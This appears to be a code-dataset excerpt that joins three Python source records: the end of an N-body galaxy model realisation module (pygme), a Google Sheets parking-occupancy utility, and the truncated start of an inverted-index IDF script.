self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = funcEpiratio(self.R[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]])\n else :\n self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRTheta[i]\n\n print(\"NStar = %d particles Realised over a total of %d\" %(self.nRealisedPartStar, self.nPartStar))\n print(\"NGas = %d particles Realised over a total of %d\" %(self.nRealisedPartGas, self.nPartGas))\n print(\"NHalo = %d particles Realised over a total of %d\" %(self.nRealisedPartHalo, self.nPartHalo))\n if self.nRealisedPartBH == 1:\n print(\"Adding a BH particle of %e Msun\" %(self.Mbh))\n firstStar = 0 # index for the first Star particle\n firstGas = lastStar = self.nRealisedPartStar # index for the first Gas particle - last Star particle\n firstHalo = lastGas = firstGas + self.nRealisedPartGas # index for the first Halo particle - last Gas particle\n firstBH = lastHalo = firstHalo + self.nRealisedPartHalo # index for the BH particle - last Halo particle\n ##################################### END STARS, GAS, HALO ######################################\n\n ## Computing some important quantities : R, r, theta, xarc etc ------------------------- ##\n self.R = sqrt(self.x**2 + self.y**2)\n ## And r spherical\n self.r = sqrt(self.x**2 + self.y**2+self.z**2)\n\n ## Now computing the true theta\n self.theta[(self.x == 0.) & (self.y >= 0.)] = np.pi / 2.\n self.theta[(self.x == 0.) & (self.y < 0.)] = -np.pi / 2.\n self.theta[(self.x < 0.)] = arctan(self.y[(self.x < 0.)] / self.x[(self.x < 0.)]) + np.pi\n self.theta[(self.x > 0.)] = arctan(self.y[(self.x > 0.)] / self.x[(self.x > 0.)])\n\n ### Transforming in arcsecond\n self.xarc = self.x / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.yarc = self.y / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.zarc = self.z / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.Rarc = self.R / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.rarc = self.r / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n\n R2 = (self.Rarc)**2 ## R in arcsec\n Z2 = (self.zarc)**2 ## z in arcsec\n\n ############### Computing velocities for the N body realisation ##################\n if ComputeV :\n ### Integration using gaussian quadrature ###\n ### First compute the gaussian quadrature points, and weights\n print(\"Starting the derivation of velocities\")\n self.muTheta2 = np.zeros(self.nRealisedPart, floatMGE)\n self.sigz = np.zeros(self.nRealisedPart, floatMGE)\n self.sigR = np.zeros(self.nRealisedPart, floatMGE)\n self.sigT = np.zeros(self.nRealisedPart, floatMGE)\n self.vt = np.zeros(self.nRealisedPart, floatMGE)\n if verbose :\n print(\"End of memory alloc\")\n\n##### OPTION REMOVE if self.GLOBAL_Sigma == False :\n ## Doing it in Dynamical groups #################################\n if verbose :\n print(\"STARTING Local Sigma for each Dynamical Group\")\n ## First check that Dynamical Groups are ordered\n setGauss_Stars = list(range(self.nStarGauss))\n setGauss_Halo = list(range(self.nStarGauss + self.nGasGauss, self.nGauss))\n setGauss = np.concatenate((setGauss_Stars, setGauss_Halo))\n nRealisedPart = self.nRealisedPartStar + self.nRealisedPartHalo\n ## First derive the equations for each INDIVIDUAL DYNAMICAL GROUP for SIGMA_Z\n if nRealisedPart != 0 :\n for i in range(self.nDynComp) :\n iminG = np.min(self.listGaussDynComp[i])\n imaxG = np.max(self.listGaussDynComp[i])\n if (iminG >= self.nStarGauss) & (imaxG < self.nStarGauss+self.nGasGauss) & GasDisk:\n continue\n for j in range(iminG+1, imaxG) :\n if j not in self.listGaussDynComp[i] :\n print(\"ERROR: Dynamical Group %d should included ordered Gaussians\"%(i+1))\n print(\"ERROR: Dynamical Group %d is \"%(i+1),self.listGaussDynComp[i])\n return\n\n startI, endI = self.nRealisedPartCum[iminG], self.nRealisedPartCum[imaxG+1]\n if endI <= startI :\n continue\n R2comp = R2[startI: endI]\n Z2comp = Z2[startI: endI]\n self.rho, self.rhoT = self._MassDensity(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n temp1, temp2 = self._sigmaz2_muTheta2_fromR2Z2(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.sigz[startI: endI] = sqrt(temp1)\n self.muTheta2[startI: endI] = temp2\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Dynamical Group %02d\"%(i+1))\n\n##### REMOVING THIS OPTION - NOT REQUIRED CONSIDERING THE INPUT ASCII FILE WITH DYN GROUPS ###### else :\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"STARTING GLOBAL Sigma for All Stars and then Halo\"\n#### OPTION REMOVED ###### ## STARS ####################\n#### OPTION REMOVED ###### R2Star = R2[firstStar:lastStar]\n#### OPTION REMOVED ###### Z2Star = Z2[firstStar:lastStar]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = 0\n#### OPTION REMOVED ###### imax = self.nStarGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Stars\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstStar:lastStar] = temp1\n#### OPTION REMOVED ###### self.mut2[firstStar:lastStar] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Stars\"\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## HALO ####################\n#### OPTION REMOVED ###### R2Halo = R2[firstHalo:lastHalo]\n#### OPTION REMOVED ###### Z2Halo = Z2[firstHalo:lastHalo]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = self.nStarGauss + self.nGasGauss\n#### OPTION REMOVED ###### imax = self.nGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Halos\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstHalo:lastHalo] = temp1\n#### OPTION REMOVED ###### self.mut2[firstHalo:lastHalo] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Halo\"\n\n ## Using only kRZ and kRTheta\n sigR = self.sigz * self.NkRZ\n sigTheta = np.minimum(sqrt(self.muTheta2), sigR / self.NkRTheta) # sigma Theta from sigma R\n vt = sqrt(np.clip(self.muTheta2 - sigTheta**2, 0., np.inf))\n self.sigR[firstStar:lastStar] = sigR[firstStar:lastStar] # sigma R from sigma Z\n self.sigR[firstHalo:lastHalo] = sigR[firstHalo:lastHalo] # sigma R from sigma Z\n self.sigT[firstStar:lastStar] = sigTheta[firstStar:lastStar] # sigma Theta from sigma R\n self.sigT[firstHalo:lastHalo] = sigTheta[firstHalo:lastHalo] # sigma Theta from sigma R\n # Mean V theta\n self.vt[firstStar:lastStar] = vt[firstStar:lastStar]\n self.vt[firstHalo:lastHalo] = vt[firstHalo:lastHalo]\n if not GasDisk :\n self.sigR[firstGas:lastGas] = sigR[firstGas:lastGas] # sigma R from sigma Z\n self.sigT[firstGas:lastGas] = sigTheta[firstGas:lastGas] # sigma Theta from sigma R\n self.vt[firstGas:lastGas] = vt[firstGas:lastGas]\n if verbose :\n if GasDisk :\n print(\"End of sigz2 and mu2 derivation for All Stars and Halo particles\")\n else :\n print(\"End of sigz2 and mu2 derivation for All Stars, Gas and Halo particles\")\n\n ## GAS ######################\n if opGAS & GasDisk:\n self.vt[firstGas:lastGas] = self.Vcirc(self.Rarc[firstGas:lastGas])\n self.muTheta2[firstGas:lastGas] = self.vt[firstGas:lastGas]**2 + self.SigThetaGas**2\n temp = np.zeros_like(self.sigR[firstGas:lastGas])\n self.sigR[firstGas:lastGas] = temp + self.SigRGas # sigma R for the Gas\n self.sigT[firstGas:lastGas] = temp + self.SigThetaGas # sigma Theta for the Gas\n self.sigz[firstGas:lastGas] = temp + self.SigZGas # sigma Z for the Gas\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Gas\")\n\n ## Changing the spin of the component\n self.vt *= self.NSpin\n\n ## Starting the randomization of velocities using the derived V and Sigma values\n print(\"Randomizing the Velocities\")\n Vescape = self.Vescape(self.Rarc,self.zarc) # Vescape : cut it if the total velocity is higher\n Nrejected = 0\n Nstart = 0\n Nremain = self.nRealisedPart\n ind = list(range(self.nRealisedPart))\n self.Vz = np.zeros(self.nRealisedPart, floatMGE)\n self.VR = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtheta = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtot = np.zeros(self.nRealisedPart, floatMGE)\n iter = 0\n while Nremain != 0 :\n ### Randomize the positions taking into account the 3D width of the Gaussian\n self.Vz[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigz[ind]\n self.VR[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigR[ind]\n self.Vtheta[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigT[ind] + self.vt[ind]\n\n self.Vtot[ind] = sqrt(self.Vz[ind]**2 + self.VR[ind]**2 + self.Vtheta[ind]**2)\n\n ind = np.ravel(np.where(self.Vtot[ind] > Vescape[ind])) # indices which are NOT ok with Vesc\n nrealised = Nremain - ind.size\n Nstart = Nstart+nrealised\n Nremain = ind.size\n iter += 1\n print(\"NtotalV = %d, Nrealised = %d, Nremaining = %d, Iter = %d\" %(Nstart, nrealised, Nremain, iter))\n Nrejected += Nremain\n\n print(\"Rejected (recalculated) points above Vescape: %d\" %(Nrejected))\n\n self.Vx = self.VR * cos(self.theta) - self.Vtheta * sin(self.theta)\n self.Vy = self.VR * sin(self.theta) + self.Vtheta * cos(self.theta)\n\n return\n\n############################################################################################################\n####################################### END OF NBODY REALIZATION ###########################################\n############################################################################################################\n\n def comp_Pot(self) :\n self.EcPot = self.Pot(self.Rarc, self.zarc)\n self.EcPotT = np.sum(self.EcPot)\n return\n\n def comp_Ep(self) :\n print(\"==== Potential Energy ====\")\n print(\"WARNING: this is a direct computation of the potential energy: can be time consuming!\")\n self.Ep = np.zeros(self.nRealisedPart, floatMGE)\n for i in range(self.nRealisedPart) :\n Ep = np.sum(concatenate((1./sqrt((self.x[:i] - self.x[i])**2 + (self.y[:i] - self.y[i])**2 + (self.z[:i] - self.z[i])**2), 1./sqrt((self.x[i+1:] - self.x[i])**2 + (self.y[i+1:] - self.y[i])**2 + (self.z[i+1:] - self.z[i])**2))),axis=0)\n self.Ep[i] = - Ep * self.Gorig * self.BodMass**2\n\n self.EpT = np.sum(self.Ep,axis=0) / 2.\n return\n\n def comp_Ec(self) :\n print(\"==== Kinetic Energy ====\")\n self.Ec = 0.5 * self.BodMass * (self.Vx**2 + self.Vy**2 + self.Vz**2)\n self.EcT = np.sum(self.Ec,axis=0)\n return\n\n ################## Projection of the MGE model ################\n def projpart(self, inclin=90.) :\n \"\"\" Projection of an MGE realization (N particles) using a defined inclination\n inclin: inclination in degrees, 90 being edge-on, 0 being face-on\n \"\"\"\n\n inclin_rad = inclin * np.pi / 180.\n self.Xp = self.x\n self.Yp = self.y * cos(inclin_rad) + self.z * sin(inclin_rad)\n self.Zp = - self.y * sin(inclin_rad) + self.z * cos(inclin_rad)\n self.Xparc = self.Xp / self.pc_per_arcsec\n self.Yparc = self.Yp / self.pc_per_arcsec\n self.Zparc = self.Zp / self.pc_per_arcsec\n\n self.Vrad = self.Vy * sin(inclin_rad) - self.Vz * cos(inclin_rad)\n\n return\n #===================================================================\n\n ##################################################################\n ### Save the Nbody coordinates x,y,z,Vx,Vy,Vz in an ascii file #\n ##################################################################\n def save_nbody(self, outdir=None, outfilename=None, overwrite=False, arcsec=False) :\n \"\"\" Save the N body realizationof an MGE model into an ascii file\n name : string defining the name of the output file\n overwrite: if file exists, overwrite or not - default = False\n arcsec: save the positions in arcseconds or pc - default= False (pc)\n \"\"\"\n if outfilename is None :\n print(\"You must specify an output ascii file\")\n return\n\n if outdir is not None :\n outfilename = outdir + outfilename\n\n if os.path.isfile(outfilename) and overwrite==False : # testing the existence of the file\n print('WRITING ERROR: File %s already exists, use overwrite=True if you wish' %outfilename)\n return\n\n ascii_file = open(outfilename, mode=\"w\")\n\n if arcsec == True :\n outx = self.xarc\n outy = self.yarc\n outz = self.zarc\n else :\n outx = self.x\n outy = self.y\n outz = self.z\n\n for i in range(self.nRealisedPart) :\n line = \"%12.5e %12.5e %12.5e %12.5e %12.5e %12.5e %12.5e \\n\" %(outx[i], outy[i], outz[i], self.Vx[i], self.Vy[i], self.Vz[i], self.BodMass[i])\n ascii_file.write(line)\n\n ascii_file.close\n return\n #===================================================================\n", "sub_path": "pygme/init_partMGE.py", "file_name": "init_partMGE.py", "file_ext": "py", "file_size_in_byte": 30045, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygme.dynMGE.dynMGE", "line_number": 27, "usage_type": "name"}, {"api_name": "pygme.dynMGE.dynMGE.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "pygme.dynMGE.dynMGE", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.int", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 158, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 159, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 160, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 161, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 161, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 162, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 165, "usage_type": "argument"}, {"api_name": "numpy.ones", "line_number": 171, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 171, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 172, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 172, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 173, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 173, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 177, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 180, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 180, "usage_type": "name"}, {"api_name": "pygme.paramMGE.dynParamMGE", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 202, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 203, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 206, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 206, "usage_type": "name"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_r2gauss", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 209, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 209, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 210, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 210, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 227, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 229, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 233, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 233, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 272, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 272, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 274, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 275, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 275, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 276, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 276, "usage_type": "argument"}, {"api_name": "numpy.concatenate", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 391, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 391, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 392, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 392, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 393, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 393, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 394, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 394, "usage_type": "argument"}, {"api_name": "numpy.asarray", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 398, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 398, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 399, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 399, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 400, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 400, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 431, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 431, "usage_type": "argument"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 451, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 480, "usage_type": "call"}, {"api_name": "os.path", "line_number": 480, "usage_type": "attribute"}]} +{"seq_id": "471967973", "text": "import gspread\nimport time\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import *\n\nscope = []\ncreds = []\n\nsheet = None\nlogSheet = None\nclient = None\n\nDATE_FORMAT_STRING = \"%Y-%m-%d %H:%M:%S EST\"\n\n# Getters\n\ndef isThereParking():\n return (spacesAvailable() > 0)\n\ndef occupiedStatusList():\n # Returns a list of bools that signify which parking spots are occupied\n\n connectSheet() # Refresh the sheet values\n statusList = sheet.col_values(2)[1:] # Get all booleans concerning occupation status\n\n for status in statusList: # Cast all values to boolean for sanity checking\n status = bool(status)\n\n return statusList\n\ndef spacesAvailable():\n occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n\n parkingSpaceCount = 0\n\n for i in range(0, len(occupiedStatuses)):\n if isOccupied(i):\n parkingSpaceCount = parkingSpaceCount + 1\n\n return parkingSpaceCount\n\ndef isOccupied(zeroIndexedSpaceNumber):\n occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n return occupiedStatuses[zeroIndexedSpaceNumber].lower() == \"true\" # Get from list, cast to bool\n\ndef getParkingSpaceCount():\n occupiedStatuses = occupiedStatusList() # get list of booleans from Google Sheets spreadsheet\n return len(occupiedStatuses) # Return the number of booleans in the list.\n\n# Setters\n\ndef setOccupied(zeroIndexedSpaceNumber):\n connectSheet() # Refresh state\n index = 2 + zeroIndexedSpaceNumber\n\n if not isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n logOccupation()\n\n sheet.update_cell(index, 2, True); # Set the specified space to be occupied\n\ndef setVacant(zeroIndexedSpaceNumber):\n connectSheet() # Refresh state\n index = 2 + zeroIndexedSpaceNumber\n\n if isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n logVacancy()\n\n sheet.update_cell(index, 2, False); # Set the specified space to be unoccupied\n\ndef setParkingSpaceCount(oneIndexedSpaceNumber):\n if (oneIndexedSpaceNumber < 1):\n return\n\n initialIndex = getParkingSpaceCount() # Get number of parking spaces in lot.\n\n # If the index is greater than the list length, then allocate more rows\n # to the table and ID accordingly.\n if oneIndexedSpaceNumber > initialIndex:\n for i in range( (initialIndex + 2),(oneIndexedSpaceNumber + 2) ):\n sheet.update_cell(i, 1, i-2)\n sheet.update_cell(i, 2, False)\n # Otherwise, if lesser, eliminate all items indexed at/after oneIndexedSpaceNumber.\n elif oneIndexedSpaceNumber < initialIndex:\n for i in range( (oneIndexedSpaceNumber + 2),(initialIndex + 2)):\n sheet.update_cell(i, 1, \"\")\n sheet.update_cell(i, 2, \"\")\n\n # If the length is the same as it already is, make no changes.\n\n\n\n#\n# All backend stuff to do with google sheets stuff\n#\n\ndef connectSheet():\n if isUninitialized():\n makeConnection()\n\ndef isUninitialized():\n return (sheet == None)\n\ndef makeConnection():\n # Make the connection to the Google Spreadsheet\n scope = ['https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive']\n creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n\n global client\n client = gspread.authorize(creds)\n global sheet\n global logSheet\n sheet = client.open('parking-status').get_worksheet(0)\n logSheet = client.open(\"parking-status\").get_worksheet(1)\n\n#\n# DateTime stuff\n#\n\ndef dateTimeFormat(dateTimeValue):\n return dateTimeValue.strftime(DATE_FORMAT_STRING)\n\ndef logVacancy(dateTimeValue = datetime.now()):\n timeListIndex = len(logSheet.col_values(1)) + 1 # Get row to insert time in\n logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Insert time into list.\n newLogValue = int(logSheet.cell(timeListIndex - 1, 2).value) - 1 # Get new count of people in lot\n logSheet.update_cell(timeListIndex, 2, newLogValue) # Set new count of people in lot to sheet\n\ndef logOccupation(dateTimeValue = datetime.now()):\n columnLength = len(logSheet.col_values(1)[1:]) # Read length of date column\n timeListIndex = columnLength + 2 # Get new index of insertion into log\n newOccupancyCount = 0\n\n if columnLength > 0: # If a previous value exists, our new occupancy is based on the previous value.\n newOccupancyCount = int(logSheet.cell(timeListIndex - 1, 2).value) + 1\n else: # Otherwise, our new occupancy is 1 because we assume that our initial occupancy is 0.\n newOccupancyCount = 1\n\n logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Set new date in column 1\n logSheet.update_cell(timeListIndex, 2, newOccupancyCount) # Set new occupancy count in column 2\n\n\n# ALL CODE THAT IS RUN FOR CERTAIN IS RUN HERE\n", "sub_path": "util/sheets.py", "file_name": "sheets.py", "file_ext": "py", "file_size_in_byte": 4925, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 107, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 107, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "381163747", "text": "import numpy as np\nimport multiprocessing\nimport pickle\nimport pandas as pd\nfrom utils import load_pkl\nfrom cli import get_args\nfrom pathlib import Path\nimport os\nDATA_LEN = 46972\n\n\ndef get_inverted_data(model_dir):\n with open(model_dir / \"inverted-file\", \"r\") as f:\n unigram_idf = {}\n bigram_idf = {}\n doc_datas = [{'doc_len': 0, 'unigram': {}, 'bigram': {}} for _ in range(DATA_LEN)]\n while True:\n head_line = f.readline().strip()\n if head_line == \"\":\n break\n head_line = list(map(int, head_line.split()))\n head_idx = head_line[0]\n print(head_idx, end='\\r')\n if head_line[1] == -1:\n unigram_idf[str(head_idx)] = np.log(DATA_LEN / head_line[2])\n else:\n bigram_idf[str(head_idx) + \" \" + str(head_line[1])] = np.log(DATA_LEN / head_line[2])\n for _ in range(head_line[2]):\n line = f.readline()\n line = list(map(int, line.strip().split()))\n if head_line[1] == -1:\n doc_datas[line[0]]['doc_len'] += line[1]\n doc_datas[line[0]]['unigram'][str(head_idx)] = line[1]\n else:\n doc_datas[line[0]]['bigram'][str(head_line[0]) + \" \" + str(head_line[1])] = line[1]\n return unigram_idf, bigram_idf, doc_datas\n\n\nif __name__ == \"__main__\":\n args = get_args()\n if os.path.exists(\"unigram_idf.pkl\") and os.path.exists(\"bigram_idf.pkl\") and os.path.exists(\"doc_datas.pkl\"):\n pass\n else:\n unigram_idf, bigram_idf, doc_datas = get_inverted_data(args.model_dir)\n with open(\"unigram_idf.pkl\", \"wb\") as f:\n pickle.dump(unigram_idf, f)\n\n with open(\"bigram_idf.pkl\", \"wb\") as f:\n pickle.dump(bigram_idf, f)\n\n with open(\"doc_datas.pkl\", \"wb\") as f:\n 